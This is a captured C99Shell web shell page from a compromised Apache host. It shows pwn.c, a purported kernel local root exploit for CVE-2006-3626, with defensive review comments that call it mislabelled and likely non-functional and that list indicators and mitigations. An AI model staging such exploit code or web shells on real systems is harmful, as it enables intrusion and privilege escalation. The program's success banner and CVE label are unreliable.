!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/var/tmp/   drwxrwxrwt
Free 3.41 GB of 27.03 GB (12.62%)


Viewing file:     pwn.c (1.9 KB)      -rw-r--r--
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <string.h>

/* Path the program creates, mounts over and polls. It sits in /var/tmp, which
 * is world-writable, so an unprivileged account can create it; the path is a
 * usable filesystem indicator when triaging a host. */
#define FILENAME "/var/tmp/h0lysh1t"
/* Program exec'd by drop_shell(). */
#define PAYLOAD "/bin/bash"

/*
 * drop_shell - print a success banner, request uid 0 and gid 0, then exec
 * PAYLOAD in place of the current process.
 *
 * Does not return: execl() either replaces the process image or, on failure,
 * the function reports the error and calls exit().
 *
 * NOTE(review): the "GOT ROOT" banner is printed before anything is checked,
 * and the return values of setuid()/setgid() are ignored. These calls only
 * request a credential change; for a caller without the needed privilege they
 * fail and the shell is started with the credentials the process already had.
 * Nothing in this function elevates privilege by itself, so the banner is not
 * evidence that a compromise succeeded.
 *
 * Detection: a web-server account exec'ing an interactive shell from a binary
 * staged in a temp directory is worth alerting on regardless of outcome.
 */
void drop_shell() {
    printf("[+] GOT ROOT. Starting shell...\n");
    /* Results unchecked: failure here is silent. */
    setuid(0);
    setgid(0);
    execl(PAYLOAD, PAYLOAD, NULL);
    /* Only reached when execl() itself failed. */
    perror("execl failed");
    /* Exits with status 0 even though this is the failure path. */
    exit(0);
}

/*
 * main - create a regular file at FILENAME, try to mount a tmpfs over it, then
 * fork into two busy loops: the child polls open(FILENAME) and calls
 * drop_shell() on the first success; the parent repeatedly remounts, unmounts
 * and re-creates FILENAME.
 *
 * argc and argv are unused.
 *
 * Returns 1 when open, mmap, write, the first mount or fork fails. The final
 * `return 0` is not reached: the child either loops or leaves through
 * drop_shell(), the parent loops forever, and the fork-failure branch
 * returns 1.
 *
 * NOTE(review): the kernel build and CVE id in the banners are the author's
 * label; the code never checks the running kernel. CVE-2006-3626 is publicly
 * described as a race condition in /proc, yet nothing in this listing touches
 * /proc and no step alters the process's credentials before drop_shell() is
 * called. As written this looks like a mislabelled or non-functional sample;
 * treat the label as unverified and confirm against the vendor advisory.
 *
 * Triage value: its presence still shows an attempted local privilege
 * escalation staged through a web shell. Indicators visible here are the file
 * at FILENAME, mount/umount/mknod system calls issued by a web-server account,
 * and two processes spinning without sleeping. Mitigations: apply the vendor
 * kernel update for the CVE, remove the web shell and close its upload path,
 * and mount world-writable temp directories nosuid/nodev/noexec.
 */
int main(int argc, char **argv) {
    int fd, pid;
    char *p;

    printf("Linux Kernel 2.6.17-1.2142_FC4smp Local Root\n");
    printf("CVE-2006-3626 (Modified for direct root shell)\n");

    /* Clear any previous state at FILENAME; both results are ignored. */
    umount(FILENAME);
    mknod(FILENAME, 0644|S_IFREG, 0);

    fd = open(FILENAME, O_WRONLY | O_TRUNC);
    if (fd < 0) {
        perror("open failed");
        return 1;
    }

    /* One anonymous private page used only as a scratch buffer for the
     * 8-byte marker below; it is never unmapped. */
    p = (char *)mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap failed");
        close(fd);
        return 1;
    }

    /* 8 characters plus the terminator; only the 8 characters are written. */
    strcpy(p, "h0lysh1t");

    if (write(fd, p, 8) != 8) {
        perror("write failed");
        close(fd);
        return 1;
    }
    close(fd);

    /* NOTE(review): mount(2) normally requires CAP_SYS_ADMIN, and the target
     * here is a regular file rather than a directory. For an unprivileged
     * caller this call is expected to fail, in which case the program stops
     * here with "mount failed" -- confirm on the affected host's audit log. */
    if (mount("h0lysh1t", FILENAME, "tmpfs", 0, "size=0") < 0) {
        perror("mount failed");
        return 1;
    }

    pid = fork();
    if (pid == 0) {
        /* Child: spin until FILENAME can be opened read-only, then hand over
         * to drop_shell(), which does not return. The descriptor from the
         * successful open is never closed. */
        for (;;) {
            if (open(FILENAME, O_RDONLY) < 0)
                continue;
            else {
                drop_shell();
            }
        }
    } else if (pid > 0) {
        /* Parent: spin on remount; after each successful remount, unmount and
         * re-create the regular file. No exit condition and no wait on the
         * child. MS_MGC_VAL is a legacy magic value in the flags word. */
        for (;;) {
            if (mount("h0lysh1t", FILENAME, "tmpfs", MS_MGC_VAL | MS_REMOUNT, "size=0") < 0)
                continue;
            else {
                if (umount(FILENAME) == 0)
                    mknod(FILENAME, 0644|S_IFREG, 0);
            }
        }
    } else {
        perror("fork failed");
        return 1;
    }

    return 0;
}

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0029 ]--